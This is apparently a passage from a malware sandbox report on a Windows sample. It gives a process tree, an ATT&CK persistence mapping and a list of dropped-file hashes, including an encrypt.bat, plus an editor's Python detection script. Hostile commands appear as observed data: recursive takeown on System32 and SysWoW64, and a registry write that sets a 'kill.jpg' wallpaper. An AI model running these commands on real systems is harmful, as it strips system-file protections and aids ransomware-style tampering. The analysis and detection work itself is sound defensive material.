Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Tree depth: 1
PID:4396
-
C:\Windows\System32\rundll32.exe
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Tree depth: 1
PID:1208
-
\??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k localservice -s fdPHost
Tree depth: 1
PID:3664
-
C:\Windows\system32\taskmgr.exe
Command line: "C:\Windows\system32\taskmgr.exe" /7
Tree depth: 1
PID:2868
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
Command line: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Tree depth: 1
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3024
-
C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe"
Tree depth: 1
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
- Modifies termsrv.dll
PID:4328
-
C:\Windows\system32\takeown.exe
Command line: takeown /f /im C:\Windows\System32 /r /d Y
Tree depth: 2
- Modifies file permissions
PID:4916
-
C:\Windows\system32\takeown.exe
Command line: takeown /f /im C:\Windows\System32
Tree depth: 2
- Modifies file permissions
PID:148
-
C:\Windows\system32\takeown.exe
Command line: takeown /f C:\Windows\System32 /r /d Y
Tree depth: 2
- Modifies file permissions
PID:656
-
C:\Windows\System32\rundll32.exe
Command line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
Tree depth: 1
PID:376
-
C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe"
Tree depth: 1
PID:1100
-
C:\Windows\system32\takeown.exe
Command line: takeown /f /im C:\Windows\SysWoW64 /r /d Y
Tree depth: 2
- Modifies file permissions
PID:588
-
C:\Windows\system32\takeown.exe
Command line: takeown /?
Tree depth: 2
- Modifies file permissions
PID:2324
-
C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe"
Tree depth: 1
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
PID:4820
-
C:\Windows\system32\takeown.exe
Command line: takeown /f C:\Windows\Syswow64 /r /d Y
Tree depth: 2
- Modifies file permissions
PID:3428
-
C:\Windows\regedit.exe
Command line: "C:\Windows\regedit.exe"
Tree depth: 1
- Manipulates Digital Signatures
- Modifies Installed Components in the registry
- Registers new Print Monitor
- Modifies system executable filetype association
- Registers COM server for autorun
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:2204
-
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
Tree depth: 1
PID:988
-
C:\Windows\system32\taskmgr.exe
Command line: "C:\Windows\system32\taskmgr.exe" /4
Tree depth: 1
PID:4576
-
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
Tree depth: 1
PID:3628
-
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Command line: "C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
Tree depth: 1
PID:4640
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
Command line: OfficeC2RClient.exe /error PID=4640 ProcessName="Microsoft Excel" UIType=0 ErrorSource=0x0 ErrorCode=0xe ShowUI=1
Tree depth: 2
- Process spawned unexpected child process
PID:1208
-
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
Tree depth: 1
PID:2864
-
C:\Windows\regedit.exe
Command line: "C:\Windows\regedit.exe"
Tree depth: 1
- Runs regedit.exe
PID:3616
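Two behaviours in the tree above are worth a detection rule on their own: the wallpaper-tamper chain (a `reg add` to `HKCU\Control Panel\Desktop\Wallpaper`, followed at the same nesting level by `rundll32 user32.dll,UpdatePerUserSystemParameters`, which is the call that makes the new wallpaper take effect) and the `takeown /r` calls against `C:\Windows\System32` and `C:\Windows\SysWoW64`, which strip TrustedInstaller ownership from the whole system directory tree. The Python below is an added example by the editor, not code from the sandbox report or from the sample: it encodes a handful of the records above as constructed input (PIDs, depths and command lines transcribed from the tree) and runs the two checks over them, plus a nesting-depth check; the depth threshold of 10 and the pairing of a write with a refresh at the same depth are the editor's assumptions, the latter reflecting how each level of this tree lists the pair as siblings.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    """One process record: pid, nesting depth in the tree, image path, command line."""
    pid: int
    depth: int
    image: str
    cmdline: str


# Constructed sample: a handful of records transcribed from the process tree
# in this report. Not a live telemetry feed.
SAMPLE = [
    Proc(1148, 24, r"C:\Windows\system32\rundll32.exe",
         "RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters"),
    Proc(1100, 22, r"C:\Windows\system32\reg.exe",
         r'reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ '
         r'/d ""C:\Users\Admin\Desktop\kill.jpg"" /f'),
    Proc(3948, 22, r"C:\Windows\system32\rundll32.exe",
         "RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters"),
    Proc(4916, 2, r"C:\Windows\system32\takeown.exe",
         r"takeown /f /im C:\Windows\System32 /r /d Y"),
    Proc(2324, 2, r"C:\Windows\system32\takeown.exe", "takeown /?"),
    Proc(3428, 2, r"C:\Windows\system32\takeown.exe",
         r"takeown /f C:\Windows\Syswow64 /r /d Y"),
    Proc(2868, 1, r"C:\Windows\system32\taskmgr.exe",
         r'"C:\Windows\system32\taskmgr.exe" /7'),
]

# reg.exe writing the per-user wallpaper value
WALLPAPER_RE = re.compile(
    r'reg\s+add\s+"?HKCU\\Control Panel\\Desktop"?\s+/v\s+Wallpaper\b', re.IGNORECASE)
# rundll32 export that re-reads desktop settings and applies the new wallpaper
REFRESH_RE = re.compile(
    r"user32(?:\.dll)?\s*,\s*UpdatePerUserSystemParameters", re.IGNORECASE)
# takeown target: the first non-switch token after /f (switches such as /im skipped)
TAKEOWN_RE = re.compile(
    r'\btakeown\b.*?\s/f\s+(?:/\w+\s+)*(?P<target>"[^"]+"|\S+)', re.IGNORECASE)
RECURSIVE_RE = re.compile(r"(?:^|\s)/r(?:\s|$)", re.IGNORECASE)
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def wallpaper_tamper(procs):
    """Pair each wallpaper registry write with the rundll32 refresh at the same
    tree depth. Returns (write_pid, refresh_pid_or_None) per write."""
    refreshes = [p for p in procs if REFRESH_RE.search(p.cmdline)]
    hits = []
    for w in procs:
        if not WALLPAPER_RE.search(w.cmdline):
            continue
        partner = next((r.pid for r in refreshes if r.depth == w.depth), None)
        hits.append((w.pid, partner))
    return hits


def system_takeown(procs):
    """Report takeown against System32/SysWoW64 and whether it recursed (/r)."""
    hits = []
    for p in procs:
        m = TAKEOWN_RE.search(p.cmdline)
        if not m:
            continue
        target = m.group("target").strip('"').rstrip("\\").lower()
        if target.startswith(SYSTEM_DIRS):
            hits.append((p.pid, target, bool(RECURSIVE_RE.search(p.cmdline))))
    return hits


def max_depth(procs):
    return max((p.depth for p in procs), default=0)


def findings(procs, depth_limit=10):
    """Collect the three signals as (rule, detail) pairs; depth_limit is an assumption."""
    out = [("wallpaper_tamper", h) for h in wallpaper_tamper(procs)]
    out += [("system_takeown", h) for h in system_takeown(procs)]
    if max_depth(procs) > depth_limit:
        out.append(("deep_nesting", max_depth(procs)))
    return out


if __name__ == "__main__":
    for rule, detail in findings(SAMPLE):
        print(rule, detail)
```

On the sample this yields one wallpaper write paired with its refresh (PIDs 1100 and 3948 at depth 22), two recursive takeown hits against the system directories, and a deep-nesting flag at depth 24; `takeown /?` and the taskmgr launch are correctly ignored. Against real endpoint telemetry the same logic would key on parent/child relationships rather than the sandbox's depth column.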
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (4)
  - Registry Run Keys / Startup Folder (4)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Change Default File Association (1)
Privilege Escalation
- Boot or Logon Autostart Execution (4)
  - Registry Run Keys / Startup Folder (4)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Change Default File Association (1)
Downloads
-
C:\Encrypt\encrypt.bat
Filesize 2KB
MD5 e678740f3d7186df8911224ea11f35f1
SHA1 f01a152d4388c856e14819f2b9d36db67cb1d22e
SHA256 181f77f261d2a8ba55f2926ac9997b8a95d3068ec32afa60465cb9b98e08435a
SHA512 6d1ee7e000a60f1618264a10279ae186d1a03e98143b1e3090a656b8cc8205c28db0caf0b31f4584c72570b9a322187a8554e66e9c564d1ab66bcfdb4a32fec9
-
C:\Encrypt\encrypt.html
Filesize 1KB
MD5 60722a327960e4b4f5d967101a72ed06
SHA1 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA256 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA512 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 3KB
MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OHP8MVFQ\edgecompatviewlist[1].xml
Filesize 74KB
MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 aeb197f0f2bcd56fe9a5f7e77460e87d
SHA1 5c84dc762be4bc1ff6fdc0afeb29ac82069086f0
SHA256 29e0ec875f9db98101c0911b5db43b451391714a08b7d0d60593aec0ad203145
SHA512 de6dcc9107f347420ab4a3eae84a1e0ed233ec6aee69c22611931f9ac42c7a10a4f8350434bbf87a5b9df4837546cec73a4b6db5f04ed75a0599e7e767ee922a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 39758f695b9440cff4cd90243a5c54c0
SHA1 bdc25b5666f28b5e5d54765f689c95b790dc04aa
SHA256 ac07c8591fc8594fc7c51fd7fe0cb5b2cda6287fb061daecb591e4a4c45dd674
SHA512 ebb8550d95e8a4e8400a595209361872d3f8f85e826a0b63d8aab5c19a0e9f03e4121a8633b398f3c3a9ea0f08eac0bf26288e8987b78602648d20e1d6cbe244
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 8a8b7580ddcf9f26ed879b1d9fb9b439
SHA1 7510dccca48a86d3dc8d0abb266ba21994454734
SHA256 6eb23d27bbee82cad5758658c6c6f2805901c7a5f656eee5891872e594875c11
SHA512 d9e666b09d1299ceda51242e0cd12e1157d146e8eca86238351d9c5ebdf09269258b4a49cd3f14ae782e02dd6dcb05db26e8e347bc4a1cd9cc2d594db8aee55b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 b969acde029c377073dd4d3a51d35b5f
SHA1 f651182f94bb4b94707e07e25a33338c6086199d
SHA256 0c73fc1ceda6041080e7c4ab39103449010c57e9cad8749589d58e9d681833c2
SHA512 54e7fc9bc821896e9b1eb1d3b69071b5fa4b0add1804d5e85114e36541c336bb60b7a8c7c382e370ee51e9805d80814c074c36e6dc19654f23aa3b1631ffcb1e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 533f2a84c9ba61eb58345eecd7c58f3b
SHA1 de62ae9340ac15a700630456a3d21f2464f8bc7a
SHA256 d10cb89b5c21c42cf6f552ad3ddc23b5022720143e4c7b39037116828f81cbe4
SHA512 d7fb59e2901da81b0d5902a0067e1c2575fed8249fec137050af51ebb4be74cd986fe7b6de40ec6897198a3af8d197680a446dcd991b35cfa79c3b8a3de0a54e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 f6e4f19cdf76eafaf91f50fc29e2eac2
SHA1 0d7c3b119f2b96fbafeaaf43c15f98558604b615
SHA256 6f01a7cbb24129b3808bbe7097b1e2fca7b1cfa00241ea4af33cc9198e063711
SHA512 e11d68f2b1117f7af9daaace9638a28adee63746985acaa33b6e5d4e7b1a986da57938f14d47e014a04208946285cded9b455f6dffa93733af5396e06b9f726b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 7aa8e552592f75dcc2e6db191c2c79a8
SHA1 8517cafa9fc95e7b47c6bc94a443d1409d7350c0
SHA256 baa470df875e2d140adcbf1e2552510d72ba893cf1bb6e7c99875256b598c5f2
SHA512 d1ade8263e95f003b91a56fb9a7cba7bcb528f2a284756061c2e3d8f8196ce75dffa9fda996b01f1f2a18dbcdd7b9eea5737a8fccf3a105956ec3453d95762e4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 1e5a8b044967b98b4414b64553d0306a
SHA1 fcf7e5df4cdc6de2829dc6b5445a63a4b6d17fc5
SHA256 bc7c1bae49379da52ddfaa5219ac85287061a529d3e1ce2c4c214178bce92cbc
SHA512 675cf9fcf5ac1b502f671e61d9d3fad1f1649d3171ca22051d40cc69377fb4da07a5dcb25dd92b952100f6d2d8171f3ae84f8317c932566b12dfa493ee51433f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 30a4e28df116298059172a672f559cb6
SHA1 6a9c356bf65d797e5e893f5d0665f412460e6583
SHA256 c0aba1540d4ea379034f15cd0251628585e56d3fadab69c87cce9b1b210948af
SHA512 7cb5b9a105b80afa339a65f8d2a301cf7e4eb609e5956098167337cd76ea0f0efc0d30910665032126abcc3f9f0473da14ddd14c0decf3f03b83818e11740e93
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 134c2a914ce70bf9d674c54446a63b46
SHA1 149b5e1850cbc7011e05f98e65b91e16c4375d53
SHA256 a6b8644f8f71de98e40e380f6d3b14d53cba55726698377eae66acbe0875ae12
SHA512 4081e8ed0ad2c080b2619ab3cece3ee0ef782198b52b36999668be6ee9bc5d681481c551a491b77348e2da9ed0631499ba9e104a32b5699198bb19bec54eae55
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 a2d2b1657dad6af051717eebf5910973
SHA1 a99102d39c81c07060ab595b9e1d3514337e8802
SHA256 2724e345fd6aa5714b61a3bb5c81c29b5bb11053cc05e2ca9b74b5aa6e74085a
SHA512 bffe1730963659f6e4e0d6f8628ee48e4d37401c96e70b3944ad8533e22d219bcbd7496fea239995514bdd793d6eb396f4713ef17cab844ec3b3c199178bd437
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 4d6b6a66cf7696e3e1ff4a9542c8ce95
SHA1 648af552b13f79eb6dca773f99c74cc842766693
SHA256 6b1b5d528a7496c7d0ea5987f5ff09d85a45549dcb0f6ddff6709c803d55d978
SHA512 996b7caf7867fb92450b452de917e39882afc6d2ad9eaf1e4d73898866bb79dcac688717d12a8f67cde6557d39c8cd96824cc393b95be0f879c8d24ecaaa49b4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 3f06c2b231fc3afa5ec0d61f4c836fc8
SHA1 cb0f037efaedffe0242fed7d9a2d36586d6aa7dd
SHA256 0e355a4eaf20e6bff12eb2f0f3f3a2caf5932ca20ad3654eb33845869e55ee80
SHA512 68655f3e7b1e93a7700ea0b12dd1740bd79ce49397da2ec738cd986e0ff11ea3277f707edf63641c39afab8490cf84d9ea6832ad8c3b865d4e9a4383f7e500b8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 9eb2435b8949e9b02958e0e5ac378712
SHA1 932d9ec1d48ffd36edc6189eb4bd6f84e8e01ad5
SHA256 cd61aa1cac0240fc16ff64a5712aea97fffd8600b94c17c0baed4772312f2b7a
SHA512 6ebfbfb6efdceca232f031d2ed0af9694b1fbbd358b8d77fc48531fd9306976440a6836a7349a9924cf8c24f03c67f19fee050a86965fbbfad0ee75199081a91
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 06221a5c3b8bdeedfa030585ba965e17
SHA1 dec6dc833a59709aed7e73947ddecf099d4f2f03
SHA256 48979b31b2f2c87864095a512e9f265bb5a54a9c07ea714d9e0c180eb188dd0e
SHA512 61d0ed82bf031989f54ffa9fddd5764a38c617ab7e3d07b72f25da738fa5177c6bda23e522545f975b0ff90b048d7f795cd15e2e5fe900365177f4619bcea400
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 e4ad725122d361309b5834fab3b7b2d1
SHA1 3bb713ec705ee11dddbc87f76b69918ffe9718f9
SHA256 5e0134dba69d93984ffc6a34d9e9404971f879cd528b6ebbbc6bed6a6f505539
SHA512 7eb4a1f989770d62bb1c618ee7e9589e545a45e82c2d93d5ed0c1a730e9e360751bbec8172debb4d47524323e89dd10dcd2a1c4c6be6abfab5ff0c6bcd64ad90
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 e546d0cf2a2942a61ef8eceb13995e3d
SHA1 d3249bec1f8a7c6fd8fb4e5879e29f65c6f9a2ab
SHA256 c0e29e7ce67343216185d8eb84b46827a46b4f3e26e8c6535e156167dd9bae57
SHA512 978f5084b10e01ce75562581067386ff2bf6cea6167b6d901a826db9796c3b7dd9be27996d6d1f66f8f28ea8c3162baebd9359ccbcf56e27b1d242788b52a576
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 746099233cada96eb72bfc89a09ee1a2
SHA1 9385d6ae0794c26fe6acb2177926ff2be47bd1f1
SHA256 0251bdf306bd6ccba81ab87c3a33da203dbea0760f1f2de2623a531414a227fd
SHA512 349f56268d5896a4622a93a3e4ba5077f08eabe5bdb78723b980897281c393f7c92bbaa71936e105f3f51a1586b2db28a99fa5e61d75895a908a93218b288d31
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 5a80ac54ac1a68b662837245fbb35186
SHA1 2e8b2cdb9637934bfa70ab67651ed6da01b63271
SHA256 3632ba939989e3aea46e2d33d9e99c830bd2eebb68e719cf4749426f3f7b59e4
SHA512 d4c789dad26797fc1c2a73faa0d9d77654b7b9315aa1e1eea8002ff51afdccf755a871f1c28dbf96cea3b2bcaef3f888366425fa186fd2652fe6fdf6c3e01b4a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 23ab05a4873eee1a304d65fe5b396adc
SHA1 00e25691e1dd5f16e7de677c9607101dc33aba32
SHA256 d915df34c10395fd747cdba37fb3248d9b8af01a818d52365948acc3056d1746
SHA512 16a13a1f11d4b1c3e43aab2c0ea12728b268f698346bf1f9f81956e53505f361177322542896d81d630c3d6da0fcb9d2d063deffffc58c3b95d284d80b943ca8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 e1a497638ab23a3f7bd3ed5d21714023
SHA1 c5b63a240618c16fe65fff87ed26d1f389eb55b4
SHA256 eb04b136c6ea073707890bf6ba180bba4e2f0e4a5497daf221ba79906b2ea845
SHA512 d061089b02c7233342955d543098e37e6c92f094e06c1776d0aa1173ea148e0741c8a9b59a99074195502edec86944a5b34fca63779abeaf4b234cb3fed0a2d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 4075739cf7b22ddcc47f11204b94058c
SHA1 dd7f53387dc5aa7bb3d72a0e5f3e53963bf253eb
SHA256 759f1bc6467157b67f830399c750b37f7df07c4786013a556d5d399ed8a610a2
SHA512 65dba78709056d0f48d8212e74bcdafa78fe656cf289b628306e4fa4c8675b7a650d961f93459901c3da2fa65b4df663c47f61923b8e07ab8cb3715bdbfc2e11
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 ae960397caff07b6d95abe79f2d8adf4
SHA1 d6f5f1409859fdf43dfb29d72cb9bd15b4ac6a59
SHA256 9d766327d908df38be7295481b302f2424cb15d6a91e50bdcb05bd3926f00d2b
SHA512 bfd29c4aa86ec5fc04d3d9a1941ac279087d4144a98a271285e8f1075c672407f1fce3c80049e1b0b2f95701b8cc40fbb0dd21419f4f5f8f3974c8acfaf911f1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 02f435b06d6f68930b9271108a2ac3a9
SHA1 2e609d7933342d5c94094cd5bd8a3c71f252150f
SHA256 cc9c8f83f6b95d1e2c4362219bd759a4b78c311574109688e1ea97a4829265ac
SHA512 ac7f932b23b7dce30f628fd43b7de5aa295d453571f380c81b3b2ff7a73d2ffd6510c53d5c672740e0def71eecb39c50555a9a51e3a3b702cb68d0386643914e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 b2cad475d0a25a7a9f0ffb98d5db5a0c
SHA1 1f6bea5f0d217388506732afe8a0af4c81170d5a
SHA256 8e7da05289fa77c975bdb3cd84f3b7aad1347b97db57d863476c83a62644c252
SHA512 34681fc655272674e268619835a0c4ce23309cece586e4554c8d8507c6be1ad276a57e631b01ca26910007da0329d31a6f2c34495d9cb340c49dbfbba96bcde9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 6454647c82081d308305eecce744ae87
SHA1 387a9a1b07a82f2e8d4d6b1a25cc6202c092e195
SHA256 65f1a48649ead715dcdef07a024ec2c48d5df9fddee932c36417d272a3784d00
SHA512 9828cb1cd6827492063c1ef05ebf4b2002262a2da96a9edef50bb2e44766716ce29d49c098f671b3db8b5f2b0afba53f882b3a91b4a0d7215219c75dff370496
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 c59651964aafd94606cdec65e0357be5
SHA1 cac908a3d1179d39e927eb3987e40033e63fe3bc
SHA256 d26717a1ee831c5e2420d046343cc7e725e11e7219a796a4a7776e2d32cbda42
SHA512 02e59ebc4ffc40ebdb73f3350ed0e20334017a1d06dd0f9d13842f2decaf7c95dfc772e119ec04e543f4b523585b4f3df1b3e6e4e842b2d14c76c18be57f093f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 cdbbf6c67cbfbe5314207503a8c4ec90
SHA1 dfa93929e4c947f78312ef0b63db59026eaf48c4
SHA256 6e690259bd65d2063169f8d577298e22c6b68a31082d8f5ce2aad7989b6d91bb
SHA512 a86547d3e390e0dcf3d74fe9ba5c982116cf4084716c30a93c015cf090e561b6fed32d5477a1e5b8aecad94b9dd949a4158040f39b6eaba871bcb8fbd6529525
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 1918c847bd85b1f52fbf5b236d708b76
SHA1 a8392344bff3b22238b05875aac1b032dd6f1eb6
SHA256 42d282e57574e5be61d961b7ad4922b63524454ed725d2ece60c37326b9c1717
SHA512 788496fdc7247026a1b7f6bb25e0bda900530eb7177fa60968c54f262d1361a3a87b118ef299ad5ce56d891fb5385ed58e7b4bbf3a6183f592ce78d358039458
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 f3cdb452f7964ad18155580108cb6bab
SHA1 146436170c819ad9659db2fa6012a345db57121c
SHA256 de36fda760b717811dab418d5bc9bed7915136396db1d349aeb2656842531da4
SHA512 99a73a60170cf11c7405a472450e0a0876e9c91d8b066db6a76bd15cb4a417e551880b87b6677d810a10790b30e0ad9cbea8bb4c234d87fd03fa5a1bc92b073d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 a0b81dad552f223acea0f844508cd6a3
SHA1 2e32995bf406a88db081ea4c0ed1e938618ac36b
SHA256 5c8de76100b4e225cbb3f266915495b305bec4162c948ec8983920f65a46a3cc
SHA512 f2380117858e5777ac6844ba42ce904f0f96ea2e20bc3b16b32a633a94d87d50e26eb2e63be362c718c85bce1e39a289fe3578cae26d0e4725e302446347f03a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 0f060cc615a49aa7ccd41ccb28bb39ce
SHA1 208bbefed8a5a1c471ea12cad494d138c647ea9a
SHA256 ea888870f6271412ee57f8175dee13cd609d3e824941a68cb639b8283db27d58
SHA512 212a8c4d01c2a539ca3af4611ac406586bd90ae7140d977b323382a9f5e5f95c6b145316bba88495d145b0d8fd765957a3fbc43156095f671a41ff1b12181a84
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\403X124A\suggestions[1].en-US
Filesize 17KB
MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DF99E3C6010B8CB4D2.TMP
Filesize 16KB
MD5 088addaa6632758ede2090a59457dc0f
SHA1 11d699d542885cb51c91e90355f3f3d78e244258
SHA256 d9f7935c1aa3e6ab68bf283511631257b308314de9ca60687298203a1c45a610
SHA512 1162ce3c65b782aad6360ce1dfaecb883bb79270f07f9de7a75346fa2b656a1e5792a08086cd165a682e115176f63b82ffad72ad9da8552199fb704f063305b1
-
C:\Users\Admin\AppData\Local\Temp\RGI8799.tmp
Filesize 24KB
MD5 d0e162c0bd0629323ebb1ed88df890d6
SHA1 cf3fd2652cdb6ff86d1df215977454390ed4d7bc
SHA256 3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744
SHA512 a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_bz2.pyd
Filesize 83KB
MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_cffi_backend.cp312-win_amd64.pyd
Filesize 178KB
MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_decimal.pyd
Filesize 245KB
MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
